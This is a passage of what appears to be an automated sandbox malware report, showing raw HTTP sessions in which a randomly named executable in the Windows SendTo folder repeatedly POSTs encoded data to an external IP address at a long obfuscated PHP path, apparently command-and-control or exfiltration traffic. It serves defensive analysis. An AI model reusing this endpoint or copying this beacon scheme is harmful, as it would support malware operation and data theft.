                                          Data Ascii: [QCVPFY\Y_QQR]TPZZZPUVSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:<<*#T)]40&*)=?Z*;4Q?&'&)?1<8%9[&!^-3
                                          Sep 13, 2024 21:03:47.717782021 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:47.870826960 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:47 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          77192.168.2.45674731.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:48.287765980 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          78192.168.2.45674831.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:48.343519926 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2084
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:48.691998005 CEST2084OUTData Raw: 5e 51 43 55 55 40 59 50 59 5f 51 51 52 5a 54 53 5a 59 5a 5b 55 51 53 47 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^QCUU@YPY_QQRZTSZYZ[UQSGPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9*<1!224-[)&T+<%)'<<0 V$*;E%?3%+9[&!^-/
                                          Sep 13, 2024 21:03:49.088601112 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:49.219090939 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:48 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 39 52 2b 26 30 0f 27 2b 2f 51 2c 3e 3e 14 27 3c 3c 13 3f 33 08 1b 3f 03 12 59 2e 2a 36 58 33 05 31 12 30 2f 23 5c 27 2c 3b 1b 2a 10 2e 46 0d 1d 26 00 3d 3f 0d 0e 28 2e 0e 5b 30 3e 21 59 23 30 33 16 25 2f 3f 53 37 02 2e 12 20 0c 24 0b 31 04 29 11 2c 25 04 16 3d 22 3a 5f 20 36 2e 55 0f 15 39 1a 32 31 0c 50 3c 22 3c 06 29 2f 04 56 32 2f 3c 09 31 15 23 0f 24 16 2e 52 25 2c 25 10 31 31 02 01 3f 2d 21 55 21 0f 2a 52 22 3b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989R+&0'+/Q,>>'<<?3?Y.*6X310/#\',;*.F&=?(.[0>!Y#03%/?S7. $1),%=":_ 6.U921P<"<)/V2/<1#$.R%,%11?-!U!*R";'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          79192.168.2.45674931.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:48.562556982 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:48.910805941 CEST2532OUTData Raw: 5e 52 43 51 50 44 59 55 59 5f 51 51 52 58 54 53 5a 5f 5a 50 55 50 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^RCQPDYUY_QQRXTSZ_ZPUPSAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:?/2X#705);U?^);((,:00(%:A&?8Z2;9[&!^-'
                                          Sep 13, 2024 21:03:49.300360918 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:49.453161955 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:49 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          80192.168.2.45675031.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:49.600754023 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:49.957474947 CEST2532OUTData Raw: 5e 55 43 5f 55 4b 5c 50 59 5f 51 51 52 58 54 50 5a 58 5a 51 55 50 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^UC_UK\PY_QQRXTPZXZQUPSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9B+#6709]((.W??%_)3+/!0 4P&:A&?;';9[&!^-'
                                          Sep 13, 2024 21:03:50.369389057 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:50.535459042 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:50 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          81192.168.2.45675131.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:51.101450920 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:51.457535028 CEST2532OUTData Raw: 5b 55 46 51 55 42 5c 57 59 5f 51 51 52 5b 54 51 5a 5b 5a 5d 55 57 53 49 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [UFQUB\WY_QQR[TQZ[Z]UWSIPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9C(/!19 0>)%(=[>(+.'V%9<1< 29[&!^-+
                                          Sep 13, 2024 21:03:51.843934059 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:51.972672939 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:51 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          82192.168.2.45675231.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:52.107944012 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:52.457658052 CEST2532OUTData Raw: 5e 56 43 55 50 40 5c 56 59 5f 51 51 52 58 54 54 5a 58 5a 59 55 50 53 46 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^VCUP@\VY_QQRXTTZXZYUPSFPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9?#"%Y4)[)&T+)+(?<$0+1/D%#%;9[&!^-'
                                          Sep 13, 2024 21:03:52.906841040 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:53.041019917 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:52 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          83192.168.2.45675331.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:53.169855118 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:53.520037889 CEST2532OUTData Raw: 5b 57 43 55 55 44 59 5c 59 5f 51 51 52 5f 54 56 5a 59 5a 58 55 5e 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [WCUUDY\Y_QQR_TVZYZXU^SBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:(\!"#35Y>85<<**^ <%031$$<;';9[&!^-;
                                          Sep 13, 2024 21:03:54.855592966 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:54.856364965 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:53 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:54.856744051 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:53 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:54.858067036 CEST225INHTTP/1.1 100 Continue
                                          Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 33 20 53 65 70 20 32 30 32 34 20 31 39 3a 30 33 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Sep 2024 19:03:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4?V@Z0
                                          Sep 13, 2024 21:03:54.860810041 CEST225INHTTP/1.1 100 Continue
                                          Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 33 20 53 65 70 20 32 30 32 34 20 31 39 3a 30 33 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Sep 2024 19:03:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          84192.168.2.45675431.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:54.865626097 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2108
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:55.223128080 CEST2108OUTData Raw: 5b 52 43 50 55 45 5c 51 59 5f 51 51 52 5f 54 55 5a 5c 5a 59 55 57 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RCPUE\QY_QQR_TUZ\ZYUWSDPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:*/6X#=X 3=]*(9?<5X=;;?3?&)<%,<X1;9[&!^-;
                                          Sep 13, 2024 21:03:55.607487917 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:55.772758961 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:55 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 3a 0f 29 36 33 56 27 28 3b 54 2c 03 0c 50 26 2c 20 5c 28 1d 03 41 2b 03 15 01 2c 2a 2a 58 27 3b 31 11 30 2c 27 11 27 3c 2c 09 3d 3a 2e 46 0d 1d 26 06 3d 06 3f 0d 3e 10 3c 11 27 2d 31 58 34 09 20 04 24 11 01 1c 37 05 3e 12 23 31 23 11 26 2a 3e 01 2f 0b 2d 06 2a 08 32 59 20 0c 2e 55 0f 15 39 14 26 22 25 08 28 32 3c 06 2a 2c 35 0f 25 06 23 56 27 38 3f 0a 27 2b 25 0d 25 01 0f 1f 25 31 27 5b 2a 2d 2a 0e 35 0f 0f 0f 22 11 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 98:)63V'(;T,P&, \(A+,**X';10,''<,=:.F&=?><'-1X4 $7>#1#&*>/-*2Y .U9&"%(2<*,5%#V'8?'+%%%1'[*-*5"'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          85192.168.2.45675531.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:54.865748882 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2528
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:55.223268032 CEST2528OUTData Raw: 5b 5f 43 55 50 43 59 5d 59 5f 51 51 52 59 54 50 5a 52 5a 5f 55 5e 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [_CUPCY]Y_QQRYTPZRZ_U^S@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(Y1#2%4=*6V<")^4V<,*00/1C13&+9[&!^-/
                                          Sep 13, 2024 21:03:55.608974934 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:55.793765068 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:55 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          86192.168.2.45675631.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:55.953028917 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:56.301549911 CEST2532OUTData Raw: 5e 52 43 56 55 45 59 5c 59 5f 51 51 52 58 54 5a 5a 52 5a 5f 55 57 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^RCVUEY\Y_QQRXTZZRZ_UWSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9+,) 21_46>;9?%^=3+Z"Z$072\(2'%+9[&!^-'
                                          Sep 13, 2024 21:03:56.710599899 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:56.866528034 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:56 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          87192.168.2.45675731.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:57.040509939 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:57.394980907 CEST2532OUTData Raw: 5e 53 43 53 55 46 5c 57 59 5f 51 51 52 58 54 5a 5a 52 5a 59 55 5e 53 44 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
